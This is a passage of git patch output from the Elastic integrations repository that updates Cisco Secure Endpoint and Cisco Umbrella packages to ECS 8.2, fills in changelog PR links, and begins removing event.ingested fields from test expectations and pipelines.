"8.0.0" + "version": "8.2.0" }, "event": { "action": "Potential Dropper Infection", @@ -3292,7 +3292,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -3357,7 +3357,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3430,7 +3430,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3516,7 +3516,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3605,7 +3605,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3681,7 +3681,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3757,7 +3757,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3833,7 +3833,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3909,7 +3909,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3986,7 +3986,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4083,7 +4083,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4168,7 +4168,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -4244,7 +4244,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4320,7 +4320,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json index 9ab2f15ee2c..474df773a06 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json @@ -37,7 +37,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -110,7 +110,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -196,7 +196,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -282,7 +282,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -372,7 +372,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -461,7 +461,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -537,7 +537,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -609,7 +609,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -682,7 +682,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -772,7 +772,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -852,7 +852,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -938,7 +938,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1017,7 +1017,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected in Low Prevalence Executable", @@ -1086,7 +1086,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -1146,7 +1146,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "File Fetch Completed", @@ -1234,7 +1234,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1332,7 +1332,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -1408,7 +1408,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1485,7 +1485,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1584,7 +1584,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1682,7 +1682,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -1749,7 +1749,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -1814,7 +1814,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Executed malware", @@ -1896,7 +1896,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Multiple Infected Files", @@ -1974,7 +1974,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -2047,7 +2047,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2134,7 +2134,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2207,7 +2207,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2296,7 +2296,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2372,7 +2372,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2448,7 +2448,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2521,7 +2521,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2606,7 +2606,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2678,7 +2678,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2751,7 +2751,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2837,7 +2837,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2926,7 +2926,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2999,7 +2999,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3089,7 +3089,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3179,7 +3179,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3273,7 +3273,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3376,7 +3376,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Malicious Activity Detection", @@ -3477,7 +3477,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3564,7 +3564,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3651,7 +3651,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3738,7 +3738,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3822,7 +3822,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -3894,7 +3894,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -3967,7 +3967,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", diff --git a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml index 64a86275937..cb8d2c4f94c 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml @@ -40,7 +40,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - set: field: event.kind value: alert diff --git a/packages/cisco_secure_endpoint/data_stream/event/sample_event.json b/packages/cisco_secure_endpoint/data_stream/event/sample_event.json index 6debb78f59e..384a7112253 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/sample_event.json +++ b/packages/cisco_secure_endpoint/data_stream/event/sample_event.json @@ -50,7 +50,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "584f3aea-648c-4e58-aba4-32b8f88d4396", diff --git a/packages/cisco_secure_endpoint/docs/README.md b/packages/cisco_secure_endpoint/docs/README.md index e9269fb0943..4c797e0ec33 100644 --- a/packages/cisco_secure_endpoint/docs/README.md +++ b/packages/cisco_secure_endpoint/docs/README.md @@ -66,7 +66,7 @@ An example event for `event` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "584f3aea-648c-4e58-aba4-32b8f88d4396", diff --git a/packages/cisco_secure_endpoint/manifest.yml b/packages/cisco_secure_endpoint/manifest.yml index 0b3f9ccc5d1..e27db7430ae 100644 --- a/packages/cisco_secure_endpoint/manifest.yml +++ b/packages/cisco_secure_endpoint/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_secure_endpoint title: Cisco Secure Endpoint (AMP) -version: 2.0.0 +version: 2.1.0 license: basic description: Collect logs from Cisco Secure Endpoint (AMP) with Elastic Agent. type: integration From 821dcf444f912e3b81e7450ebf883722c7549bcf Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Wed, 23 Feb 2022 12:19:13 -0600 Subject: [PATCH 17/23] Update cisco_umbrella to ECS 8.2 --- packages/cisco_umbrella/_dev/build/build.yml | 2 +- packages/cisco_umbrella/changelog.yml | 5 +++++ .../test-umbrella-cloudfirewalllogs.log-expected.json | 4 ++-- .../test/pipeline/test-umbrella-dnslogs.log-expected.json | 6 +++--- .../test/pipeline/test-umbrella-iplogs.log-expected.json | 4 ++-- .../test/pipeline/test-umbrella-proxylogs.log-expected.json | 6 +++--- .../log/elasticsearch/ingest_pipeline/default.yml | 2 +- packages/cisco_umbrella/data_stream/log/sample_event.json | 2 +- packages/cisco_umbrella/docs/README.md | 2 +- packages/cisco_umbrella/manifest.yml | 2 +- 10 files changed, 20 insertions(+), 15 deletions(-) diff --git a/packages/cisco_umbrella/_dev/build/build.yml b/packages/cisco_umbrella/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_umbrella/_dev/build/build.yml +++ b/packages/cisco_umbrella/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml index 9eacd76ca49..5e118a44841 100644 --- a/packages/cisco_umbrella/changelog.yml +++ b/packages/cisco_umbrella/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.5.0" changes: - description: Update to ECS 8.0 diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json index ab8910997db..f98cd40bf11 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json @@ -26,7 +26,7 @@ "ip": "67.43.156.12" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -98,7 +98,7 @@ "ip": "67.43.156.12" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json index 54d7fcc0de7..f723b31a025 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json @@ -42,7 +42,7 @@ "type": "query" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "dns-request-Allowed", @@ -130,7 +130,7 @@ "type": "query" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "dns-request-Blocked", @@ -212,7 +212,7 @@ "type": "query" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "dns-request-Allowed", diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json index 58961a7474f..86fccef0590 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json @@ -25,7 +25,7 @@ "port": 0 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -85,7 +85,7 @@ "port": 445 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json index ad31c46b2a9..83a2b73937e 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json @@ -30,7 +30,7 @@ "ip": "81.2.69.144" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -116,7 +116,7 @@ "ip": "81.2.69.144" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -182,7 +182,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml index f0f84459906..3a637029907 100644 --- a/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: "{{_ingest.timestamp}}" - set: field: ecs.version - value: "8.0.0" + value: "8.2.0" - set: field: observer.vendor value: Cisco diff --git a/packages/cisco_umbrella/data_stream/log/sample_event.json b/packages/cisco_umbrella/data_stream/log/sample_event.json index f35e1740395..f2356b0269f 100644 --- a/packages/cisco_umbrella/data_stream/log/sample_event.json +++ b/packages/cisco_umbrella/data_stream/log/sample_event.json @@ -42,7 +42,7 @@ }, "@timestamp": "2020-07-23T23:48:56.000Z", "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "related": { "hash": [ diff --git a/packages/cisco_umbrella/docs/README.md b/packages/cisco_umbrella/docs/README.md index a8444ee2447..04bfae71d79 100644 --- a/packages/cisco_umbrella/docs/README.md +++ b/packages/cisco_umbrella/docs/README.md @@ -60,7 +60,7 @@ An example event for `log` looks as following: }, "@timestamp": "2020-07-23T23:48:56.000Z", "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "related": { "hash": [ diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml index fcb6c5b5d2d..7e7881e02f7 100644 --- a/packages/cisco_umbrella/manifest.yml +++ b/packages/cisco_umbrella/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_umbrella title: Cisco Umbrella -version: 0.5.0 +version: 0.6.0 license: basic description: Collect logs from Cisco Umbrella with Elastic Agent. type: integration From 05aa725f6c7a605672ba60acefc0cec1895bc11c Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Mon, 7 Mar 2022 11:13:58 -0600 Subject: [PATCH 18/23] Update changelogs with PR number --- packages/1password/changelog.yml | 2 +- packages/akamai/changelog.yml | 2 +- packages/atlassian_bitbucket/changelog.yml | 2 +- packages/atlassian_confluence/changelog.yml | 2 +- packages/atlassian_jira/changelog.yml | 2 +- packages/auditd/changelog.yml | 2 +- packages/barracuda/changelog.yml | 2 +- packages/bluecoat/changelog.yml | 2 +- packages/carbonblack_edr/changelog.yml | 2 +- packages/cisco_asa/changelog.yml | 2 +- packages/cisco_duo/changelog.yml | 2 +- packages/cisco_ftd/changelog.yml | 2 +- packages/cisco_ios/changelog.yml | 2 +- packages/cisco_meraki/changelog.yml | 2 +- packages/cisco_nexus/changelog.yml | 2 +- packages/cisco_secure_endpoint/changelog.yml | 2 +- packages/cisco_umbrella/changelog.yml | 2 +- 17 files changed, 17 insertions(+), 17 deletions(-) diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml index 2592c7be889..8b50d364a70 100644 --- a/packages/1password/changelog.yml +++ b/packages/1password/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "1.1.1" changes: - description: Fix field mapping conflict for ECS `event.created`. diff --git a/packages/akamai/changelog.yml b/packages/akamai/changelog.yml index 0b8b4c9780c..10c81457de1 100644 --- a/packages/akamai/changelog.yml +++ b/packages/akamai/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "0.1.1" changes: - description: Update to ECS 8.0 diff --git a/packages/atlassian_bitbucket/changelog.yml b/packages/atlassian_bitbucket/changelog.yml index 9b97737b763..f5580b9a07c 100644 --- a/packages/atlassian_bitbucket/changelog.yml +++ b/packages/atlassian_bitbucket/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/atlassian_confluence/changelog.yml b/packages/atlassian_confluence/changelog.yml index f86bec1222c..12cccb68ab8 100644 --- a/packages/atlassian_confluence/changelog.yml +++ b/packages/atlassian_confluence/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/atlassian_jira/changelog.yml b/packages/atlassian_jira/changelog.yml index 3857866bdd8..3141c2957e8 100644 --- a/packages/atlassian_jira/changelog.yml +++ b/packages/atlassian_jira/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/auditd/changelog.yml b/packages/auditd/changelog.yml index ff57fd06688..91099eb4971 100644 --- a/packages/auditd/changelog.yml +++ b/packages/auditd/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "2.1.0" changes: - description: Store EXECVE arguments in process.args array. diff --git a/packages/barracuda/changelog.yml b/packages/barracuda/changelog.yml index 4cf9fa88f2d..108d12d02cd 100644 --- a/packages/barracuda/changelog.yml +++ b/packages/barracuda/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2.0 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "0.8.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/bluecoat/changelog.yml b/packages/bluecoat/changelog.yml index 3f2ca444b74..5cffd4686b9 100644 --- a/packages/bluecoat/changelog.yml +++ b/packages/bluecoat/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2.0 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "0.7.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/carbonblack_edr/changelog.yml b/packages/carbonblack_edr/changelog.yml index 3a67be50db0..d19cf28552d 100644 --- a/packages/carbonblack_edr/changelog.yml +++ b/packages/carbonblack_edr/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml index 7be2c76dc7a..228e944e38a 100644 --- a/packages/cisco_asa/changelog.yml +++ b/packages/cisco_asa/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "2.1.0" changes: - description: Add parsing for event code 113029-113040 diff --git a/packages/cisco_duo/changelog.yml b/packages/cisco_duo/changelog.yml index 92330f0dd24..b55048baaeb 100644 --- a/packages/cisco_duo/changelog.yml +++ b/packages/cisco_duo/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml index ac00c2d6a23..309caa03d8e 100644 --- a/packages/cisco_ftd/changelog.yml +++ b/packages/cisco_ftd/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.1 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "2.0.0" changes: - description: Update to ECS 8.0 diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml index d681432540a..663609c77c3 100644 --- a/packages/cisco_ios/changelog.yml +++ b/packages/cisco_ios/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "1.4.1" changes: - description: Add missing event.original mapping diff --git a/packages/cisco_meraki/changelog.yml b/packages/cisco_meraki/changelog.yml index 8460acf2706..ebc6f14dd12 100644 --- a/packages/cisco_meraki/changelog.yml +++ b/packages/cisco_meraki/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2.0 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "0.4.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/cisco_nexus/changelog.yml b/packages/cisco_nexus/changelog.yml index c6ebd801fb9..71e6f86403d 100644 --- a/packages/cisco_nexus/changelog.yml +++ b/packages/cisco_nexus/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2.0 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "0.4.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml index 10bad37dfed..5eced5f4d5c 100644 --- a/packages/cisco_secure_endpoint/changelog.yml +++ b/packages/cisco_secure_endpoint/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "2.0.0" changes: - description: Update to ECS 8.0 diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml index 5e118a44841..2dbcff11ed6 100644 --- a/packages/cisco_umbrella/changelog.yml +++ b/packages/cisco_umbrella/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Update to ECS 8.2 type: enhancement - link: https://github.com/elastic/integrations/pull/xxxx + link: https://github.com/elastic/integrations/pull/2778 - version: "0.5.0" changes: - description: Update to ECS 8.0 From 974815100965d7cd6b647e533d68c1ab82f73455 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Wed, 16 Mar 2022 08:15:40 -0500 Subject: [PATCH 19/23] Remove event.ingested from packages --- .../pipeline/test-http-json.log-expected.json | 2 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-audit-api.log-expected.json | 177 ----------- .../test-audit-files.log-expected.json | 102 ------ .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-audit-api.log-expected.json | 182 ----------- .../test-audit-files.log-expected.json | 64 ---- .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-audit-api.log-expected.json | 98 ------ .../test-audit-files.log-expected.json | 88 ----- .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-generated.log-expected.json | 300 ------------------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-generated.log-expected.json | 300 ------------------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-generated.log-expected.json | 300 ------------------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-events.json-expected.json | 99 ------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-admin.log-expected.json | 8 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../test/pipeline/test-auth.log-expected.json | 5 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../test-offline-enrollment.log-expected.json | 1 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-summary.log-expected.json | 2 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-telephony.log-expected.json | 3 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-asa-fix.log-expected.json | 5 - .../test/pipeline/test-asa.log-expected.json | 268 ---------------- .../test/pipeline/test-dns.log-expected.json | 21 -- .../pipeline/test-filtered.log-expected.json | 2 - ...est-firepower-management.log-expected.json | 34 -- .../pipeline/test-intrusion.log-expected.json | 4 - .../test-no-type-id.log-expected.json | 4 - .../pipeline/test-not-ip.log-expected.json | 3 - .../pipeline/test-sample.log-expected.json | 71 ----- ...test-security-connection.log-expected.json | 10 - ...st-security-file-malware.log-expected.json | 10 - ...st-security-malware-site.log-expected.json | 1 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-generated.log-expected.json | 300 ------------------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-nexus.log-expected.json | 3 - .../elasticsearch/ingest_pipeline/default.yml | 4 - .../test-cisco-amp1.log-expected.json | 49 --- .../test-cisco-amp2.log-expected.json | 42 --- .../test-cisco-amp3.log-expected.json | 45 --- .../test-cisco-amp4.log-expected.json | 100 ------ .../test-cisco-amp5.log-expected.json | 62 ---- .../test-cisco-amp6.log-expected.json | 53 ---- .../test-cisco-amp7.log-expected.json | 49 --- .../elasticsearch/ingest_pipeline/default.yml | 3 - ...brella-cloudfirewalllogs.log-expected.json | 2 - .../test-umbrella-dnslogs.log-expected.json | 3 - .../test-umbrella-iplogs.log-expected.json | 2 - .../test-umbrella-proxylogs.log-expected.json | 3 - .../elasticsearch/ingest_pipeline/default.yml | 4 - 59 files changed, 2938 deletions(-) diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json index 4f30451505a..3208aeab049 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json @@ -159,7 +159,6 @@ }, "event": { "start": "2017-04-04T10:57:02.000Z", - "ingested": 